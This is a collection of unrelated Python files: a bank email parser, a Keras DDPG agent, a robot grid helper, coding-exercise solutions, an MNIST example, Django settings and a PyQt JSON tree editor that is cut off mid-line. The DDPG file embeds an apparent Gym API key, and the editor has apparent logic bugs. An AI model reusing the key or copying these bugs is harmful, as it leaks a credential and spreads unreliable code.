+{"seq_id":"100136323","text":"from bs4 import BeautifulSoup\n\n\nclass BoFA:\n def parse(self, transaction_html):\n soup = BeautifulSoup(transaction_html, \"html.parser\")\n\n amount_element = soup.find(\"td\", text=\" Amount: \")\n transaction_dict = {}\n\n if amount_element is not None:\n transaction_amount = amount_element.find_parent().find_all('td')[-1].next_element.strip()\n transaction_dict[\"amount\"] = transaction_amount\n else:\n return\n\n merchant_element = soup.find(\"td\", text=\" Merchant: \")\n\n if merchant_element is not None:\n transaction_merchant = merchant_element.find_parent().find_all('td')[-1].next_element.strip()\n transaction_dict[\"merchant\"] = transaction_merchant\n\n date_element = soup.find(\"td\", text=\" Transaction date: \")\n\n if date_element is not None:\n transaction_date = date_element.find_parent().find_all('td')[-1].next_element.strip()\n transaction_dict[\"date\"] = transaction_date\n\n transaction_dict[\"card\"] = \"BoFA Card\"\n\n return transaction_dict\n","sub_path":"gmail/api/card_parsers/bofa_parser.py","file_name":"bofa_parser.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"5946397","text":"from __future__ import print_function\n\n# Deep Deterministic Policy Gradient Method\n# David Silver et al.\n\n# implemented in plain Keras, by Qin Yongliang\n# 2017 01 13\n\n'''\nsummary\n\n0. s for state, a for action, r for reward,\n q for 'action_quality', or expectation of sum of discounted future reward.\n\n1. you have 2 network, Mr. actor and Mr. critic\n - Mr. actor generate actions: a = actor(s)\n - Mr. critic score (state,action) pairs: q = critic(s,a)\n\n >in literature, Mr. actor is function mu(s), Mr. critic is function Q(s,a)\n\n2. you improve Mr. critic by using Bellman equation, or what they call TD-learning\n - Q(s1,a1) := r1 + gamma * Q(s2,a2) where a2 = actor(s2)\n - train Mr. critic to predict the calculated Q(s1,a1) given s1 and a1, using gradient descent and MSE loss.\n\n3. after that, improve Mr. actor by gradient ascent w.r.t. Q(s,a)\n - a1_maybe = actor(s1), q1_maybe = critic(s1,a1_maybe)\n - therefore q1_maybe = critic(s1,actor(s1)). we want to increase q1_maybe!!\n - then figure out what is the gradient of actor w.r.t. q1_maybe,\n using tf.gradient() or by compositing Keras Models (as I did, to keep things clean)\n - then do gradient ascent to increase Mr. actor's actions' q-value\n\n4. to stabilize the whole learning process:\n - random sampling of training examples from replay memory\n - use 'target' networks that are copy of actor and critic,\n their weights gradually shift towards the weights of the real actor and critic\n to reduce self-correlation/oscillation (well, if you know control theory)\n - add noise to actor's output in the beginning of learning, to turn deterministic actions into probabilistic ones\n - that's basically it\n\n5. now go master the game of Gym\n'''\n\n'''\npersonal tricks:\n\ncheck the Residual Dense Unit, it works!\n'''\n\n# gym boilerplate\nimport numpy as np\nimport gym\nfrom gym import wrappers\nfrom gym.spaces import Discrete, Box\n\n# keras boilerplate: the simplest way to neural networking\nfrom keras.models import *\nfrom keras.layers import *\nfrom keras.optimizers import *\nimport keras\nfrom math import *\nimport random\nimport keras.backend as K\nimport time\n\nfrom collections import deque\n\nfrom task import Task\n\n# replay buffer per http://pemami4911.github.io/blog/2016/08/21/ddpg-rl.html\nclass rpm(object):\n #replay memory\n def __init__(self,buffer_size):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n\n def add(self, tup):\n experience = tup\n if self.count < self.buffer_size:\n self.buffer.append(experience)\n self.count += 1\n else:\n self.buffer.popleft()\n self.buffer.append(experience)\n\n def size(self):\n return self.count\n\n def sample_batch(self, batch_size):\n '''\n batch_size specifies the number of experiences to add\n to the batch. 
If the replay buffer has less than batch_size\n elements, simply return all of the elements within the buffer.\n Generally, you'll want to wait until the buffer has at least\n batch_size elements before beginning to sample from it.\n '''\n batch = []\n\n if self.count < batch_size:\n batch = random.sample(self.buffer, self.count)\n else:\n batch = random.sample(self.buffer, batch_size)\n\n item_count = len(batch[0])\n res = []\n for i in range(item_count):\n k = np.array([item[i] for item in batch])\n if len(k.shape)==1: k = k.reshape(k.shape+(1,))\n res.append(k)\n return res\n\n# residual dense unit\ndef resdense(features):\n def unit(i):\n hfeatures = max(4,int(features/4))\n\n ident = i\n i = Dense(features,activation='tanh')(i)\n\n ident = Dense(hfeatures)(ident)\n ident = Dense(features)(ident)\n\n return add([ident,i])\n return unit\n\nclass nnagent(object):\n def __init__(self,\n \ttask,\n \tdiscount_factor,\n \toptimizer\n ):\n self.rpm = rpm(1000000) # 1M history\n \n\n self.inputdims = task.state_size\n # assume observation_space is continuous\n\n # if isinstance(action_space,Box): # if action space is continuous\n\n low = task.action_low\n high = task.action_high\n\n num_of_actions = task.action_size\n\n self.action_bias = (high+low)/2.\n self.action_multiplier = high - self.action_bias\n\n # say high,low -> [2,7], then bias -> 4.5\n # mult = 2.5. then [-1,1] multiplies 2.5 + bias 4.5 -> [2,7]\n\n self.is_continuous = True\n\n def clamper(env,actions):\n return np.clip(actions,a_max=env.action_high,a_min=env.action_low)\n\n self.clamper = clamper\n # else:\n # num_of_actions = action_space.n\n\n # self.action_bias = .5\n # self.action_multiplier = .5 # map (-1,1) into (0,1)\n\n # self.is_continuous = False\n\n self.outputdims = num_of_actions\n\n self.discount_factor = discount_factor\n self.optimizer = optimizer\n\n ids,ods = self.inputdims,self.outputdims\n self.actor = self.create_actor_network(ids,ods)\n self.critic, self.frozen_critic = self.create_critic_network(ids,ods)\n\n print('inputdims:{}, outputdims:{}'.format(ids,ods))\n print('actor network:')\n self.actor.summary()\n print('critic network:')\n self.critic.summary()\n\n # target networks: identical copies of actor and critic\n self.actor_target = self.create_actor_network(ids,ods)\n self.critic_target, self.frozen_critic_target = self.create_critic_network(ids,ods)\n\n self.replace_weights(tau=1.)\n\n # now the dirty part: the actor trainer --------------------------------\n\n # explaination of this part is written in the train() method\n\n s_given = Input(shape=(self.inputdims,))\n a1_maybe = self.actor(s_given)\n q1_maybe = self.frozen_critic([s_given,a1_maybe])\n # frozen weight version of critic. 
so we can train only the actor\n\n actor_trainer = Model(input=s_given,output=q1_maybe)\n\n # use negative of q1_maybe as loss (so we can maximize q by minimizing the loss)\n def neg_q1(y_true,y_pred):\n return - y_pred # neat!\n\n actor_trainer.compile(optimizer=self.optimizer,loss=neg_q1)\n self.actor_trainer = actor_trainer\n # dirty part ended -----------------------------------------------------\n\n # (gradually) replace target network weights with online network weights\n def replace_weights(self,tau=0.002):\n theta_a,theta_c = self.actor.get_weights(),self.critic.get_weights()\n theta_a_targ,theta_c_targ = self.actor_target.get_weights(),self.critic_target.get_weights()\n\n # mixing factor tau : we gradually shift the weights...\n theta_a_targ = [theta_a[i]*tau + theta_a_targ[i]*(1-tau) for i in range(len(theta_a))]\n theta_c_targ = [theta_c[i]*tau + theta_c_targ[i]*(1-tau) for i in range(len(theta_c))]\n\n self.actor_target.set_weights(theta_a_targ)\n self.critic_target.set_weights(theta_c_targ)\n\n # a = actor(s) : predict actions given state\n def create_actor_network(self,inputdims,outputdims):\n inp = Input(shape=(inputdims,))\n i = inp\n i = resdense(32)(i)\n i = resdense(32)(i)\n i = resdense(64)(i)\n i = resdense(outputdims)(i)\n # map into (0,1)\n i = Activation('tanh')(i)\n # map into action_space\n i = Lambda(lambda x:x * self.action_multiplier + self.action_bias)(i)\n\n out = i\n model = Model(input=inp,output=out)\n model.compile(loss='mse',optimizer=self.optimizer)\n return model\n\n # q = critic(s,a) : predict q given state and action\n def create_critic_network(self,inputdims,actiondims):\n inp = Input(shape=(inputdims,))\n act = Input(shape=(actiondims,))\n i = merge([inp,act],mode='concat')\n\n i = resdense(64)(i)\n i = resdense(32)(i)\n i = resdense(32)(i)\n i = resdense(1)(i)\n out = i\n model = Model(input=[inp,act],output=out)\n model.compile(loss='mse',optimizer=self.optimizer)\n\n # now we create a frozen_model,\n # that uses the same layers with weights frozen when trained.\n for i in model.layers:\n i.trainable = False # froze the layers\n\n frozen_model = Model(input=[inp,act],output=out)\n frozen_model.compile(loss='mse',optimizer=self.optimizer)\n\n return model,frozen_model\n\n def train(self,verbose=1):\n memory = self.rpm\n critic,frozen_critic = self.critic,self.frozen_critic\n actor = self.actor\n batch_size = 64\n\n if memory.size() > batch_size:\n #if enough samples in memory\n\n # sample randomly a minibatch from memory\n [s1,a1,r1,isdone,s2] = memory.sample_batch(batch_size)\n # print(s1.shape,a1.shape,r1.shape,isdone.shape,s2.shape)\n\n # a2_targ = actor_targ(s2) : what will you do in s2, Mr. old actor?\n a2 = self.actor_target.predict(s2)\n\n # q2_targ = critic_targ(s2,a2) : how good is action a2, Mr. old critic?\n q2 = self.critic_target.predict([s2,a2])\n\n # if a2 is q2-good, then what should q1 be?\n # Use Bellman Equation! 
(recursive definition of q-values)\n # if not last step of episode:\n # q1 = (r1 + gamma * q2)\n # else:\n # q1 = r1\n\n q1_target = r1 + (1-isdone) * self.discount_factor * q2\n # print(q1_target.shape)\n\n # train the critic to predict the q1_target, given s1 and a1.\n critic.fit([s1,a1],q1_target,\n batch_size=batch_size,\n nb_epoch=1,\n verbose=verbose,\n shuffle=False\n )\n\n # now the critic can predict more accurate q given s and a.\n # thanks to the Bellman equation, and David Silver.\n\n # with a better critic, we can now improve our actor!\n\n if False: # the following part is for explaination purposes\n\n # a1_pred = actor(s1) : what will you do in s1, Mr. actor?\n a1_maybe = actor.predict(s1)\n # this action may not be optimal. now let's ask the critic.\n\n # what do you think of Mr. actor's action on s1, Mr. better critic?\n q1_maybe = critic.predict([s1,a1_maybe])\n\n # what should we do to the actor, to increase q1_maybe?\n # well, calculate the gradient of actor parameters\n # w.r.t. q1_maybe, then do gradient ascent.\n\n # so let's build a model that trains the actor to output higher q1_maybe values\n\n s_given = Input(shape=(self.inputdims,))\n a1_maybe = actor(s_given)\n q1_maybe = frozen_critic([s_given,a1_maybe])\n # frozen weight version of critic. so we only train the actor\n\n actor_trainer = Model(input=s_given,output=q1_maybe)\n\n # use negative of q1_maybe as loss (so we can maximize q by minimizing the loss)\n def neg_q1(y_true,y_pred):\n return - y_pred # neat!\n\n actor_trainer.compile(optimizer=self.optimizer,loss=neg_q1)\n\n else: # the actor_trainer is already initialized in __init__\n actor_trainer = self.actor_trainer\n\n actor_trainer.fit(s1,\n np.zeros((batch_size,1)), # useless target label\n batch_size=batch_size,\n nb_epoch=1,\n verbose=verbose,\n shuffle=False\n )\n\n # now both the actor and the critic have improved.\n self.replace_weights()\n\n else:\n pass\n # print('# no enough samples, not training')\n\n def feed_one(self,tup):\n self.rpm.add(tup)\n\n # gymnastics\n def play(self,env,max_steps=-1,realtime=False,render=True,noise_level=0.): # play 1 episode\n max_steps = max_steps if max_steps > 0 else 5000\n steps = 0\n total_reward = 0\n\n # stack a little history to ensure markov property\n # LSTM will definitely be used here in the future...\n global que # python 2 quirk\n que = np.zeros((self.inputdims,),dtype='float32') # list of recent history actions\n\n def quein(observation):\n global que # python 2 quirk\n length = que.shape[0]\n que = np.hstack([que,observation])[-length:]\n\n # what the agent see as state is a stack of history observations.\n\n observation = env.reset()\n quein(observation) # quein o1\n lastque = que.copy() # s1\n\n while True and steps <= max_steps:\n steps +=1\n\n # add noise to our actions, since our policy by nature is deterministic\n exploration_noise = np.random.normal(loc=0.,scale=noise_level,size=(self.outputdims,))\n\n action = self.act(lastque) # a1\n action += exploration_noise\n action = self.clamper(env,action)\n\n # o2, r1,\n observation, reward, done = env.step(action)\n\n # d1\n isdone = 1 if done else 0\n total_reward += reward\n\n quein(observation) # quein o2\n nextque = que.copy() # s2\n\n # feed into replay memory\n self.feed_one((lastque,action,reward,isdone,nextque)) # s1,a1,r1,isdone,s2\n\n lastque = nextque\n\n # if render and (steps%10==0 or realtime==True): env.render()\n if done :\n break\n\n verbose= 2 if steps==1 else 0\n self.train(verbose=verbose)\n\n print('episode done 
in',steps,'steps, total reward',total_reward)\n return\n\n # one step of action, given observation\n def act(self,observation):\n actor = self.actor\n obs = np.reshape(observation,(1,len(observation)))\n actions = actor.predict([obs])[0]\n return actions\n\nclass playground(object):\n def __init__(self,envname):\n self.envname=envname\n env = gym.make(envname)\n self.env = env\n\n self.monpath = './experiment-'+self.envname\n\n def wrap(self):\n from gym import wrappers\n self.env = wrappers.Monitor(self.env,self.monpath,force=True)\n\n def up(self):\n self.env.close()\n gym.upload(self.monpath, api_key='sk_ge0PoVXsS6C5ojZ9amTkSA')\n\n# p = playground('Pendulum-v0')\n\ntarget_pos = np.array([0., 0., 10.])\ntask= Task(target_pos = target_pos)\nagent = nnagent(task,\ndiscount_factor=.995,\noptimizer=RMSprop()\n)\n\ndef r(ep):\n e = task\n for i in range(ep):\n noise_level = max(3e-2,(50.-i)/50.)\n print('ep',i,'/',ep,'noise_level',noise_level)\n agent.play(e,max_steps=1000,noise_level=noise_level)\n\n\nr(100)","sub_path":"Quadcopter /nnagent/Pendulum-v0.py","file_name":"Pendulum-v0.py","file_ext":"py","file_size_in_byte":14918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
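The record above ends a Keras DDPG agent. Its `replace_weights` method is the soft (Polyak) target-network update, theta_targ <- tau*theta + (1-tau)*theta_targ. A minimal NumPy sketch of that blending rule, with small arrays standing in for the lists Keras `get_weights()` returns:

```python
# Soft (Polyak) target update, as in replace_weights() above.
import numpy as np

def soft_update(online_weights, target_weights, tau=0.002):
    """Blend online weights into target weights with mixing factor tau."""
    return [tau * w + (1.0 - tau) * w_t
            for w, w_t in zip(online_weights, target_weights)]

online = [np.ones((2, 2)), np.zeros(2)]
target = [np.zeros((2, 2)), np.ones(2)]
target = soft_update(online, target, tau=0.1)
print(target[0][0, 0])  # 0.1: the target drifts slowly toward the online net
```

With tau as small as the record's default (0.002), the target networks trail the online networks slowly, which is what keeps the bootstrapped Bellman targets stable.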
+{"seq_id":"11437665","text":"import numpy as np\r\nimport random\r\n\r\ndef gridGen(image, things_dict, gridShape, end = None):\r\n imageHeight, imageWidth = image.shape[:2]\r\n gridWidth, gridHeight = gridShape\r\n grid = np.zeros((gridHeight, gridWidth), np.uint8)\r\n things_dict_temp = things_dict.copy()\r\n if end:\r\n del things_dict_temp[end[0]]\r\n\r\n for key in things_dict_temp:\r\n thing = things_dict_temp[key]\r\n xBoundList = [int(imageWidth / gridWidth * cnt) for cnt in range(gridWidth + 1)]\r\n yBoundList = [int(imageHeight / gridHeight * cnt) for cnt in range(gridHeight + 1)]\r\n\r\n yVals, xVals = np.where(thing.mask == 255)\r\n for _ in range(int(len(xVals) / 5)):\r\n index = random.randint(0, len(xVals) - 1)\r\n xVal = xVals[index]\r\n yVal = yVals[index]\r\n\r\n gridX, gridY = _inGrid((xVals[index], yVals[index]), (xBoundList, yBoundList))\r\n\r\n if key[0] == 'G' and len(key) == 2:\r\n grid[gridY, gridX] = 1\r\n elif key[0] == 'R' and len(key) == 2:\r\n grid[gridY, gridX] = 2\r\n return grid\r\n\r\ndef locations(image, things_dict, gridShape):\r\n imageHeight, imageWidth = image.shape[:2]\r\n gridWidth, gridHeight = gridShape\r\n\r\n xBoundList = [int(imageWidth / gridWidth * cnt) for cnt in range(gridWidth + 1)]\r\n yBoundList = [int(imageHeight / gridHeight * cnt) for cnt in range(gridHeight + 1)]\r\n\r\n things_info = {}\r\n robot_info = None\r\n for key in things_dict:\r\n if key == 'ROBOT':\r\n thing_temp = things_dict[key]\r\n gridX, gridY = _inGrid((thing_temp.cX, thing_temp.cY), (xBoundList, yBoundList))\r\n\r\n robot_info = (gridY, gridX)\r\n else:\r\n thing_temp = things_dict[key]\r\n gridX, gridY = _inGrid((thing_temp.cX, thing_temp.cY), (xBoundList, yBoundList))\r\n\r\n things_info[key] = (gridY, gridX)\r\n\r\n return robot_info, things_info\r\n\r\ndef _inGrid(coord, bounds):\r\n xBoundList, yBoundList = bounds\r\n xVal, yVal = coord\r\n\r\n temp_x = xBoundList.copy()\r\n temp_y = yBoundList.copy()\r\n\r\n temp_x.append(xVal)\r\n temp_x.sort()\r\n gridX = temp_x.index(xVal) - 1\r\n\r\n temp_y.append(yVal)\r\n temp_y.sort()\r\n gridY = temp_y.index(yVal) - 1\r\n\r\n return gridX, gridY\r\n","sub_path":"Desk Arranging Robot/robotController_v20190828/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"77201751","text":"# -*- coding: utf-8 -*-\nclass Solution(object):\n def backspaceCompare(self, S, T):\n \"\"\"\n Solution: Stack\n Time Complexity: O(n)\n Space Complexity: O(n)\n Inspired By: MySELF!! (36ms, beat 15.08%)\n :type S: str\n :type T: str\n :rtype: bool\n \"\"\"\n def evaluate(target):\n stack = []\n for char in target:\n if char != '#':\n stack.append(char)\n elif stack:\n stack.pop()\n else:\n stack = []\n return stack\n\n return evaluate(S) == evaluate(T)\n\n","sub_path":"844. Backspace String Compare/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"609086947","text":"import cs50\n\ndef main():\n height = get_positive_int()\n print(\"\")\n for i in range(height):\n for j in range (height-1-i):\n print(\" \", end=\"\")\n for j in range (i+2):\n print(\"#\", end=\"\")\n print(\" \", end=\"\")\n for j in range (i+2):\n print(\"#\", end=\"\")\n print(\"\")\n print(\"\")\n \ndef get_positive_int():\n while True:\n print(\"Give me a positive int (1-23): \", end=\"\")\n height = cs50.get_int()\n if height >= 1 and height <= 23:\n break\n return height\n \nif __name__ == \"__main__\":\n main()","sub_path":"mario/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"497827838","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n#样本数据是60000*784\n#样本标签是60000*10\n\n#输入层784个神经元\n#输出层10个神经元\n#没有隐藏层\n\n#对于每一个样本来说,输入是1*784\n#对于每一个样本来说,权值是784*10\n#对于每一个样本来说,输出是1*784,输出例子2:00100000000\n\n#1、载入数据集\n'''one_hot 把标签转化为只有0和1的数据,也就是对于每一个样本,只有一位是1,其他全是0'''\n#写路径最好加原始字符串r\nmnist = input_data.read_data_sets(r\"E:\\project1\\MNIST_data\\MNIST_data\",one_hot=True)\n\n'''每个批次的大小(往神经网络中一次放入一个批次,一个批次一个批次的放入),这里的一个批次是100张图片'''\nbatch_size = 100\n\n#总共批次数量为n_batch\n'''//整数除法,返回不大于结果的最大整数'''\nn_batch = mnist.train.num_examples // batch_size\n\n#定义两个placeholder\nx = tf.placeholder(tf.float32,[None,784]) #样本集\ny = tf.placeholder(tf.float32,[None,10]) #样本标签集\n\n#创建一个简单的神经网络\nW = tf.Variable(tf.zeros([784,10])) #这个是针对每一个样本的权值,每一个样本有784个像素\nb = tf.Variable(tf.zeros([1,10])) #中间神经元个数是10,一般默认行���一\nprediction = tf.nn.softmax(tf.matmul(x,W)+b)\n\n#二次代价函数\n# loss = tf.reduce_mean(tf.square(y-prediction))\n#softmax交叉熵代价函数\n#这个函数就是softmax和交叉熵代价函数搭配使用,参数主要填的是label:真实标签,logits:预测标签\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=prediction))\n\n#使用梯度下降法\ntrain_step = tf.train.GradientDescentOptimizer(0.2).minimize(loss)\n\n#初始化变量\ninit = tf.global_variables_initializer()\n\n#结果存放在一个布尔型列表中\n'''\ntf.argmax(input, dimension, name=None) 返回最大数值的下标,dimension=0 按列找 ,dimension=1 按行找\n返回的是input中的最大值的索引号\n如果vector是一个向量,那就返回一个值,\n如果是一个矩阵,那就返回一个向量,这个向量的每一个维度都是相对应矩阵行的最大值元素的索引号。\n通常和tf.equal()一起使用,计算模型准确度\n'''\ncorrect_prediction = tf.equal(tf.argmax(y,1),tf.argmax(prediction,1))\n#求准确率\n'''correct_prediction原来的格式是bool,tf.cast将它的格式转化为float32位'''\naccuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\n\nwith tf.Session() as sess:\n sess.run(init)\n for epoch in range(21):\n for batch in range(n_batch):\n batch_xs,batch_ys = mnist.train.next_batch(batch_size)\n sess.run(train_step,feed_dict={x:batch_xs,y:batch_ys})\n \n acc = sess.run(accuracy,feed_dict={x:mnist.test.images,y:mnist.test.labels})\n print(\"Iter \" + str(epoch) + \",Testing Accuracy \" + str(acc))\n\n\n\n\n\n\n","sub_path":"3.2MNIST数据集分类简单版本.py","file_name":"3.2MNIST数据集分类简单版本.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"243572317","text":"from re import compile as regex\nfrom knock50 import sentences\n\nexpand = regex(r'([.,:?!]|[A-Z]\\w+|(\\w\\.){2,})')\ninvisible = regex(r'[\\s\\b]+')\n\ndef split(line):\n line = expand.sub(r' \\1 ', line) # or src_obj.index\n return tuple(i for i in invisible.split(line) if len(i))\n\nif __name__ == '__main__':\n for sent in sentences():\n for tok in split(sent):\n print(tok)\n","sub_path":"zchen/chapter06/knock51.py","file_name":"knock51.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"479966171","text":"\"\"\"\nDjango settings for grubbing project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\nfrom grub_environment import GrubEnv\n\nge = GrubEnv()\n\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = ge.env('SECRET_KEY')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = ge.env('DEBUG', False)\n\nTEMPLATE_DEBUG = ge.env('TEMPLATE_DEBUG', False)\n\nALLOWED_HOSTS = [ge.env('ALLOWED_HOSTS', '*')]\n\n# Application definition\n\nLOCAL_APPS = (\n 'grub',\n 'auth',\n)\n\nTHIRD_PARTY_APPS = (\n 'rest_framework',\n 'south',\n 'gunicorn',\n)\n\nDEFAULT_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.gis',\n)\n\nINSTALLED_APPS = DEFAULT_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'grubbing.urls'\n\nWSGI_APPLICATION = 'grubbing.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': ge.env('DB_ENGINE'),\n 'NAME': ge.env('DB_NAME'),\n 'USER': ge.env('DB_USER'),\n 'PASSWORD': ge.env('DB_PASS'),\n 'HOST': ge.env('DB_HOST')\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'es-VE'\n\nTIME_ZONE = 'America/Caracas'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nPOSTGIS_TEMPLATE = ge.env('POSTGIS_TEMPLATE', 'template_postgis')\nPOSTGIS_VERSION = (1, 5, 3)\n\nREST_FRAMEWORK = {\n 'PAGINATE_BY:': 10\n}\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': 'debug.log',\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['file'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n },\n}\n","sub_path":"grubbing/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"237645435","text":"import json\r\nimport sys\r\nfrom mainwindow import Ui_MainWindow\r\nfrom settings import Ui_Dialog\r\nfrom treeview import Model, Delegate, Item\r\nfrom PyQt5 import QtWidgets, QtCore\r\n\r\nclass Settings(QtWidgets.QDialog):\r\n def __init__(self, parent, columns):\r\n super().__init__(parent)\r\n \r\n self.ui = Ui_Dialog()\r\n self.ui.setupUi(self)\r\n self.model = Model(self)\r\n self.model.insertColumns(0, ['column'])\r\n self.ui.listView.setModel(self.model)\r\n self.ui.listView.setItemDelegate(Delegate())\r\n self.ui.listView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\r\n self.ui.listView.customContextMenuRequested.connect(self.contextMenu)\r\n\r\n for column in columns:\r\n self.model.insertRows(self.model.root_item.childCount(), 1)\r\n child_item = self.model.root_item.child(-1)\r\n child_item.set_data('column', column)\r\n\r\n def add_item(self):\r\n self.model.insertRows(self.model.root_item.childCount(), 1)\r\n\r\n def columns(self):\r\n result = self.exec()\r\n data = self.model.data\r\n index = self.model.index\r\n columns = [ data(index(r, 0, QtCore.QModelIndex())) for r in range(self.model.rowCount()) ]\r\n return (columns, result == QtWidgets.QDialog.Accepted)\r\n \r\n def contextMenu(self, point):\r\n self.menu = QtWidgets.QMenu(self)\r\n self.menu.addAction('Add', self.add_item)\r\n self.menu.addAction('Delete', self.delete_item)\r\n self.menu.exec_( self.focusWidget().mapToGlobal(point) )\r\n \r\n def delete_item(self):\r\n indexes = self.ui.listView.selectedIndexes()\r\n for index in indexes:\r\n self.model.removeItem(index)\r\n\r\nclass MainWindow(QtWidgets.QMainWindow):\r\n def __init__(self, app):\r\n super().__init__()\r\n \r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self)\r\n\r\n self.model = Model(self)\r\n\r\n self.ui.treeView.setModel(self.model)\r\n self.ui.treeView.setItemDelegate(Delegate())\r\n self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\r\n self.ui.treeView.customContextMenuRequested.connect(self.contextMenu)\r\n\r\n self.ui.actionAddChild.triggered.connect(self.add_child)\r\n self.ui.actionDelete.triggered.connect(self.delete_item)\r\n self.ui.actionOpen.triggered.connect(self.open_json)\r\n self.ui.actionSave.triggered.connect(self.save_json)\r\n self.ui.actionSettings.triggered.connect(self.show_settings_dialog)\r\n\r\n def show_settings_dialog(self):\r\n columns, result = Settings(self, self.model.columns()).columns()\r\n if not result:\r\n return\r\n self.model.removeColumns(0, self.model.columnCount())\r\n self.model.insertColumns(0, columns)\r\n\r\n def open_json(self, filename):\r\n\r\n def recursion(_part, _parent_index, _parts):\r\n _dict = { key:_part[key] for key in _part if not 'parts' == key }\r\n parent_item = _parent_index.internalPointer()\r\n if parent_item is None:\r\n parent_item = self.model.root_item\r\n self.model.insertRows(parent_item.childCount(), 1, _parent_index)\r\n child_item = parent_item.child(-1)\r\n child_item.set_dict(_dict)\r\n if 'parts' in _part:\r\n index = self.model.createIndex(parent_item.childCount(), 0, child_item)\r\n children = _part['parts']\r\n for child in children:\r\n recursion(child, index, parts)\r\n \r\n filename = QtWidgets.QFileDialog.getOpenFileName(self, 'Save file', '', 'JSON File (*.json)')\r\n if not filename[0]:\r\n return\r\n \r\n json_data = json.load( open(filename[0]) )\r\n self.model.removeColumns(0, self.model.columnCount())\r\n self.model.removeRows(0, self.model.root_item.childCount())\r\n self.model.insertColumns(0, 
json_data['columns'])\r\n\r\n parts = json_data['parts']\r\n for part in parts:\r\n recursion(part, QtCore.QModelIndex(), parts)\r\n \r\n def save_json(self):\r\n\r\n def recursion(parent):\r\n _dict1 = parent.dict\r\n if parent.childCount()==0:\r\n _dict1['parts'] = [ recursion(child) for child in parent.children() ]\r\n return _dict1\r\n \r\n parts = []\r\n for child in self.model.root_item.children():\r\n parts.append( recursion(child) )\r\n \r\n parts = {'columns':self.model.columns, 'parts':parts}\r\n\r\n filename = QtWidgets.QFileDialog.getSaveFileName(self, 'Save file', '', 'JSON File (*.json)')\r\n if filename[0]:\r\n json.dump(parts, open(filename[0],'w'), indent=4)\r\n\r\n def contextMenu(self, point):\r\n self.menu = QtWidgets.QMenu(self)\r\n self.menu.addAction('Add child', self.add_child)\r\n self.menu.addAction('Delete', self.delete_item)\r\n self.menu.exec_( self.focusWidget().mapToGlobal(point) )\r\n \r\n def add_child(self):\r\n indexes = self.ui.treeView.selectedIndexes()\r\n \r\n if len(indexes) == 0:\r\n self.model.insertRows(self.model.root_item.childCount(), 1, QtCore.QModelIndex())\r\n return\r\n \r\n indexes2 = []\r\n for index in indexes:\r\n if not index.row() in [ i.row() for i in indexes2 if i.parent() == index.parent() ]:\r\n indexes2.append(index)\r\n \r\n for index in indexes2:\r\n item = index.internalPointer()\r\n self.model.insertRows(item.childCount() + 1, 1, index)\r\n\r\n def delete_item(self):\r\n indexes = self.ui.treeView.selectedIndexes()\r\n\r\n if len(indexes) == 0:\r\n return\r\n\r\n indexes2 = []\r\n for index in indexes:\r\n if not index.row() in [ i.row() for i in indexes2 if i.parent() == index.parent() ]:\r\n indexes2.append(index)\r\n \r\n for index in indexes2:\r\n self.model.removeRows(index.row(), 1, index.parent())\r\n\r\ndef main():\r\n app = QtWidgets.QApplication(sys.argv)\r\n window = MainWindow(app)\r\n window.show()\r\n app.exec_()\r\n \r\nif __name__ == 